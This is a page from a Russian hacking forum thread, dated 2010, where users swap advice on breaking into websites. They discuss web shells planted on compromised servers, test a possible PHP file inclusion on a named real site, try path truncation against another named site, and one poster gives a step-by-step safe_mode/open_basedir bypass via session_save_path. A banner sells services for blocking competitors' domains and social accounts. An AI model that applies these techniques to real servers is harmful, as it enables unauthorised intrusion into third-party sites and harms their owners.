Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1194 из 2422

1194

Опции темы

Поиск в этой теме

Опции просмотра

26.03.2010, 03:06

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

С нами: 9649706

Репутация: 3338

Цитата:

всё равно их надо запустить как то

в WSO вообще-то console есть

𝕏 Twitter Reddit Telegram Копировать ссылку

26.03.2010, 03:13

wwwall

Новичок

Регистрация: 02.12.2006

Сообщений: 10

С нами: 10231423

Репутация: 0

её пробовал в первую очередь,
так же пытался на AluCaR shell и Locus7Shell
в Locus7Shell есть альтернативные методы выполненич команд, но и они не сработали

Последний раз редактировалось wwwall; 26.03.2010 в 03:29..

26.03.2010, 14:05

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

С нами: 10339586

Репутация: 1396

safemode=on?

26.03.2010, 16:03

wwwall

Новичок

Регистрация: 02.12.2006

Сообщений: 10

С нами: 10231423

Репутация: 0

Цитата:

Сообщение от $n@ke

safemode=on?

Safe mode: OFF

26.03.2010, 15:05

CyberHunter

Постоянный

Регистрация: 06.01.2010

Сообщений: 785

С нами: 8602291

Репутация: 256

Цитата:

http://www.theamazingmaid.com/microcms-admin-home.php

Случайно нашел. Это пхп-инъекция? Вот что в ошибке:

Цитата:

Warning: include(micro_cms_files/config.php) [function.include]: failed to open stream: No such file or directory in /home/theamazi/public_html/microcms-admin-home.php on line 2

Warning: include() [function.include]: Failed opening 'micro_cms_files/config.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/theamazi/public_html/microcms-admin-home.php on line 2

Fatal error: Call to undefined function microcms_check_admin_login() in /home/theamazi/public_html/microcms-admin-home.php on line 3

26.03.2010, 16:04

budden

Участник форума

Регистрация: 26.07.2008

Сообщений: 267

С нами: 9364549

Репутация: 184

CyberHunter
Нет. это просто ошибка - нет файла config.php. Можешь поискать каталог install/ - может он есть и даст тебе установить эту самую cms. Саму БД при этом вероятно придется указать с другого хоста.

Но, судя по твоему вопросу, тебе это будет не просто.

26.03.2010, 21:26

mental2

Познающий

Регистрация: 13.08.2007

Сообщений: 37

С нами: 9866407

Репутация: 1

Не подскажите, почему
http://www.asteroid.ru/user_view.phtml?2034/2/17.phtml[///...///]
Когда вставляю 4036 слешей, то они не отображаются, а когда 4037 то отображаются, да и вообще почему не пашет инклуд?

Какие могут быть причины? Из за абсолютного пути?
На счёт этого поста?
http://forum.antichat.ru/showpost.php?p=1023030&postcount=16
Где собственно последовательность?)) И если на линухе 1к символов с копейками, и на Linux 4065, то если ставить допустим 5к символов, то сработает в любом случае и там и там? или сть какие правила?

зы. Я хочу понять как это работает. На указанный сайт мне плевать.

Последний раз редактировалось mental2; 26.03.2010 в 21:32..

26.03.2010, 21:29

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

С нами: 9649706

Репутация: 3338

Код:

http://www.asteroid.ru/user_view.phtml?2034/2/17

там и так по умолчанию нужное тебе расширение добавляется, чего ты там отрезать хочешь?

26.03.2010, 22:35

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

С нами: 10339586

Репутация: 1396

Есть ли рабочие методы обхода safe-mode для Apache+PHP/5.2.12+Freebsd 8 ?
Если да, то какие?))

#10

26.03.2010, 22:49

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

С нами: 9649706

Репутация: 3338

session.save_path safe_mode and open_basedir bypass

Код:

EXAMPLES:

1. session_save_path("/DIR/WHERE/YOU/HAVE/ACCESS")
2. session_save_path("5;/DIR/WHERE/YOU/HAVE/ACCESS")

The main problem came when we use multiple ';' character and when we will
create fake directory structure to reduce '../'.

Proof of Concept:
0. Create directories:

/humhum

and

/byp

1. set open_basedir = /byp
2. create test.php 
{
session_save_path("/humhum");
session_start();
}
3. php test.php

Warning: session_save_path(): open_basedir restriction in effect.
File(/humhum) is not within the allowed path(s): (/byp) in /byp/test.php on
line 3
4. subdir.php
{
mkdir("puf");
mkdir(";a");
}
5. php subdir.php
6. cd puf
7. create byp.php 
{

session_save_path(";;/byp/;a/../../humhum");
session_start();

}
8. php byp.php
9. ls /humhum
sess_d905eb71c9ad65ce2a845cdb0fed3016

The main problem is located in session.c. PHP doesn't check, that we have
used next ';' after first. Creating fake directory structure

mkdir ';a'
mkdir '../;a'

we can reduce directory level using '../' .

Страница 1194 из 2422

1194

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57